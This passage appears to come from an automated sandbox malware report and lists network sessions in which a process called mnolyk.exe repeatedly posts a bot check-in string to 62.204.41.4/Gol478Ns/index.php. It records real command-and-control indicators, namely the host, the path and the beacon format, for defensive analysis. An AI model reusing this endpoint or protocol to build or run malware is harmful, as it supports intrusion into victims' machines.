                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:23.426613092 CET870INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      756192.168.2.75045162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:23.598728895 CET871OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:23.662494898 CET871INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      757192.168.2.75045262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:23.844381094 CET872OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:23.909277916 CET872INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      758192.168.2.75045362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:24.103441000 CET873OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:24.168864012 CET873INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      759192.168.2.75045462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:24.351475954 CET874OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:24.415527105 CET874INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      76192.168.2.74977162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:21.708261967 CET191OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:21.771372080 CET191INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      760192.168.2.75045562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:24.593085051 CET875OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:24.656892061 CET875INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      761192.168.2.75045662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:24.827370882 CET876OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:24.891055107 CET876INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      762192.168.2.75045762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:25.069011927 CET877OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:25.133157969 CET877INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      763192.168.2.75045862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:25.313774109 CET878OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:25.378963947 CET878INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      764192.168.2.75045962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:25.566570044 CET879OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:25.630063057 CET879INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      765192.168.2.75046062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:25.826616049 CET880OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:25.888734102 CET880INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      766192.168.2.75046162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:26.066420078 CET881OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:26.132620096 CET881INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      767192.168.2.75046262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:26.316744089 CET882OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:26.380753040 CET882INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      768192.168.2.75046362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:26.545691967 CET883OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:26.608530998 CET883INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      769192.168.2.75046462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:26.781065941 CET884OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:26.845169067 CET884INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      77192.168.2.74977262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:21.956084013 CET192OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:22.022943974 CET192INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      770192.168.2.75046562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:27.020473957 CET885OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:27.084064960 CET885INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      771192.168.2.75046662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:27.272311926 CET886OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:27.335064888 CET886INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      772192.168.2.75046762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:27.519526958 CET887OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:27.584702969 CET887INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
